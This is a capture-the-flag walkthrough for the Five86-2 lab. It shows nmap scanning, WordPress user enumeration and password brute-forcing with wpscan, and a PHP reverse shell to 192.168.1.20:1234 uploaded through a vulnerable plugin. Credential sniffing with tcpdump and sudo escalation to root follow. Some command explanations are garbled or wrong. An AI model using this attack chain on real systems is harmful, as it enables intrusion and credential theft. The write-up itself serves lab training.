Five86–2 CTF WALKTHROUGH

The IP address provided is 172.16.30.88 as my.

I did an nmap scan on this to find more information on it using nmap -sS -Pn — script vuln -p- 172.16.30.88. To explain the scan -sS = -Pn =running the scan in stealth mode, — script vuln = using that specific script, -p- = all ports

The following screenshot shows the results of the scan.

Using wpscan to enumerate users

Command: wpscan --url http://172.16.30.88/--enumerate u

with the above information I created a user list and saved it as userfile.txt

We now know it is a wordpress webapp with various usernames provided. we can visit the ip via our browser to see if we can find any information there. I made use of wpscan tool to bruteforce the user passwords.

command: wpscan — url http://172.16.30.88 -U userfile.txt -P /usr/share/wordlists/rockyou.txt

So far I’ve found two passwords barney = spooky1 and stephen = apollo1

We can try log in to wordpress using the above credentials

It was a hell of a problem accessing it. Upon research, I realized i needed to add this domain to /etc/hosts file which I did and it became easier to access

A glimpse of the dashboard

There are three plugins with one known to have vulnerabilities as shown below. The vulnerable plugin is ‘Insert or Embed Articulate Content into WordPress’

Exploit_DB provides a method to exploit this plugin which I followed.

Method:

1. Creating a .zip with two files: index.html, shell.php(script to set up netcat)

2. Upload this file to wordpress using barney’s account. This will be added as an e-learning block on the add new post menu as it allowed for zipped files.

we insert the file as iframe, its the free option.

our upload path is visible on the dashboard which is /wp-content/uploads/articulate_uploads/word10/index.html. we can put this on the browser and see the outcome, we’ll change index.html to index.php because that is where our script is.

checking whoami with our script

To try and gain root privilege, I need some kind of a shell so I checked whether netcat was a viable option.

Testing whether netcat is available, I added the command cmd=man nc

nc manpage

With this information, I created a php script, uploaded it to the wordpress using the same technique as above.

Script: <?php exec(“/bin/bash -c ‘bash -i>& /dev/tcp/192.168.1.20/1234 0>&1′”);

It doesn’t seem to work

Could be the firewall so we try allowing our port 1234 see if we can find anything. It works!

We first do tcpdump -D to identify the interfaces that are up and running then inspect packets from the veth interface.

running tcpdump -r cap.pcap to see the traffic captured, we find a new user paul with the password esomepasswford

we now switch to the paul account

find out if Paul has sudo rights

I identified that Paul could run the above service as user peter with no password required and i went ahead to get that shell

We now exploit peter since he has all the permissions so we can change the root password and get our flag.

cat the context of the flag2.txt file

The flag is Delta{jghj*&(^$^BV%^}

Since we are root, we can now navigate to the home directory of other users and see what we can find. Since in our challenge we have a hint that gillian has the flag we navigate to user gillian and see what we can find.

The flag here is Delta{D&hj189Hv&G(jh67##}

Submit and get your reward!!